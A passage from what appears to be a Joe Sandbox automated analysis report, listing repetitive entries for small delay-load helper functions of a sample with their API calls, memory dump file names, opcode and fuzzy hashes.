                                                                    • Instruction Fuzzy Hash: A8B012D13BC1257E312F73907E02D3A020DE1D0F10370892BF800C444098800CB40433
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229C9F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 264 229c9f-229ca4 265 229c8e-229c96 call 22a090 264->265 267 229c9b-229cae 265->267 267->265
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 9cd275c7b25dd9cbdfc58f53c91e5191f1aec37bf80f9c04759f9b406b04d5f9
                                                                    • Instruction ID: f440d071def2577540a2a1dd2befa2914c287dbb63960a43866e554047e7df13
                                                                    • Opcode Fuzzy Hash: 9cd275c7b25dd9cbdfc58f53c91e5191f1aec37bf80f9c04759f9b406b04d5f9
                                                                    • Instruction Fuzzy Hash: 10B012D22BC1217F315EB3947E02E3A02CCF1C4F10770482BF400C9440D8800C750033
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229CE5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 8c9c084798a557b973d8a6f3e13465faf947ca307fc7308bb27d57c3b18faed8
                                                                    • Instruction ID: e512a6e8dad863c14b23f3c9ea6fcc278e269fe95437aa45d81045cb47396265
                                                                    • Opcode Fuzzy Hash: 8c9c084798a557b973d8a6f3e13465faf947ca307fc7308bb27d57c3b18faed8
                                                                    • Instruction Fuzzy Hash: AFB012C12BD1217E315EB2D47C03E3A035CE1C4F10370882BF800C5440D8800C741433
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229CC7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: ef2bbb54cb33d68fbf9870370dd96ff47dc9243c886011b6a7acef1fc4df423b
                                                                    • Instruction ID: 3c09440cb48960387cdd0d0c38beaef2286b40a753b40c0b3a83ff12e210da69
                                                                    • Opcode Fuzzy Hash: ef2bbb54cb33d68fbf9870370dd96ff47dc9243c886011b6a7acef1fc4df423b
                                                                    • Instruction Fuzzy Hash: BAB012D13BC2217E316FB2947C02E3A024CE1D4F10370452BF400C5440D8800CF40533
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229CD1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 9ddaa85a0bb720cd0384bdca529724915da69dd3366e53171e56108863f53368
                                                                    • Instruction ID: f483e59e83fd51903cad263f13386486664f92e0249109e5a90f4128064e26e5
                                                                    • Opcode Fuzzy Hash: 9ddaa85a0bb720cd0384bdca529724915da69dd3366e53171e56108863f53368
                                                                    • Instruction Fuzzy Hash: 02B012D13BC1217E316FB794BE02E3A024CF1D4F10370442BF400C5440D8800CB50433
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229CDB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 576de7d9aa1b6546265d5c4f043551ddcdb2489106d6794803461be5287f038d
                                                                    • Instruction ID: b5e86d7388f905b77b1fc36fa42cf57db6df63a3d4cb5f0ea2aeaf32c30d45b4
                                                                    • Opcode Fuzzy Hash: 576de7d9aa1b6546265d5c4f043551ddcdb2489106d6794803461be5287f038d
                                                                    • Instruction Fuzzy Hash: 11B012D13BC1317E316FB2947C02E3A024CF1D4F10370482BF400C5480D8800CB40433
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229D03 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: e70a8e2480aa2c45f369e67d83a50125c2f11d09372c2897c90ef1f4f8ac3756
                                                                    • Instruction ID: 2a2cdb0dbcaad70f879bf9ce16548b5f5916cd057252269ec069a5af235adad7
                                                                    • Opcode Fuzzy Hash: e70a8e2480aa2c45f369e67d83a50125c2f11d09372c2897c90ef1f4f8ac3756
                                                                    • Instruction Fuzzy Hash: 26B092812B82217D211AA2942802E3A0249E1D4B10360452AB401C144098800CA40032
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229D6B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229D62
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 7ccdf656e753b56cb9c8defa11c7c6134925920f2e843966e7fac946cd31bb64
                                                                    • Instruction ID: d32a897d9726c3f7156d5d1489270df71694445db5ecaa1374a9e714f0cc1937
                                                                    • Opcode Fuzzy Hash: 7ccdf656e753b56cb9c8defa11c7c6134925920f2e843966e7fac946cd31bb64
                                                                    • Instruction Fuzzy Hash: 1EB012812B81217F326CB5947D02E3A034CE1C1F11730441FF404C4441D8800C782133
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229D50 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229D62
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 7d6bc8e421f30fdde2a9a513712834da0cca68a88da0b90beb9aa4a00c171d9f
                                                                    • Instruction ID: a6cf72eacb51a463c79b67ff5b1129f90e48075b5e6cd0a61f00f0bf4022caf7
                                                                    • Opcode Fuzzy Hash: 7d6bc8e421f30fdde2a9a513712834da0cca68a88da0b90beb9aa4a00c171d9f
                                                                    • Instruction Fuzzy Hash: 55B012812B82217E322C75907D02D3A030CE1D1F52330461FF401C484198800CB82133
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229CF4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: c5982fae8437cced68f54c38a665de0cae8cd1f68d75e646ea4e2d1a3d6c650b
                                                                    • Instruction ID: 91f9113587d2838bc74e490d620bb7fbfb56aee6ede8db973168a721e6b64953
                                                                    • Opcode Fuzzy Hash: c5982fae8437cced68f54c38a665de0cae8cd1f68d75e646ea4e2d1a3d6c650b
                                                                    • Instruction Fuzzy Hash: 20A001D62BD222BD352AB6A17D06E3A025DE5D9F617B1892AF80285885A8801DA91436
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229CFE Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 8b11daa9f90c9e37e68644d1393a52f3b62c5303ea25dffce31a2ad35099c99c
                                                                    • Instruction ID: 91f9113587d2838bc74e490d620bb7fbfb56aee6ede8db973168a721e6b64953
                                                                    • Opcode Fuzzy Hash: 8b11daa9f90c9e37e68644d1393a52f3b62c5303ea25dffce31a2ad35099c99c
                                                                    • Instruction Fuzzy Hash: 20A001D62BD222BD352AB6A17D06E3A025DE5D9F617B1892AF80285885A8801DA91436
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229D12 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: affbb9f147b6049a70608068ec2ebc21b961e5d790a2e27eebc8ad0e0ec97e02
                                                                    • Instruction ID: 91f9113587d2838bc74e490d620bb7fbfb56aee6ede8db973168a721e6b64953
                                                                    • Opcode Fuzzy Hash: affbb9f147b6049a70608068ec2ebc21b961e5d790a2e27eebc8ad0e0ec97e02
                                                                    • Instruction Fuzzy Hash: 20A001D62BD222BD352AB6A17D06E3A025DE5D9F617B1892AF80285885A8801DA91436
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229D1C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: adedffd656ab554e4374bc1a4758e47a7729855f6c6ceffcc3c4383e881b84c5
                                                                    • Instruction ID: 91f9113587d2838bc74e490d620bb7fbfb56aee6ede8db973168a721e6b64953
                                                                    • Opcode Fuzzy Hash: adedffd656ab554e4374bc1a4758e47a7729855f6c6ceffcc3c4383e881b84c5
                                                                    • Instruction Fuzzy Hash: 20A001D62BD222BD352AB6A17D06E3A025DE5D9F617B1892AF80285885A8801DA91436
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229D7A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229D62
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: af6f3d0134eace4e48be165ea49ccd609f6b89a496329a4a0aa7ae8813bfc1e9
                                                                    • Instruction ID: 95feb7895b71a7cc47be03b292bb028c1a6d22d0972d58b8851d31ccb8110057
                                                                    • Opcode Fuzzy Hash: af6f3d0134eace4e48be165ea49ccd609f6b89a496329a4a0aa7ae8813bfc1e9
                                                                    • Instruction Fuzzy Hash: 75A011822B8222BC3228BAA03E02E3A020CC0C2F20330880AF80280882A88008A82032
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229D84 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229D62
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 69b380e912bdfd03903c459bca29e3673b4dc849cb2ae4a96f4249ae2a086a70
                                                                    • Instruction ID: 95feb7895b71a7cc47be03b292bb028c1a6d22d0972d58b8851d31ccb8110057
                                                                    • Opcode Fuzzy Hash: 69b380e912bdfd03903c459bca29e3673b4dc849cb2ae4a96f4249ae2a086a70
                                                                    • Instruction Fuzzy Hash: 75A011822B8222BC3228BAA03E02E3A020CC0C2F20330880AF80280882A88008A82032
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229D8E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229D62
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: e0c595537bb59da188e83d34aeadfb6be3b50c555a022c7b95508cfac1463621
                                                                    • Instruction ID: 95feb7895b71a7cc47be03b292bb028c1a6d22d0972d58b8851d31ccb8110057
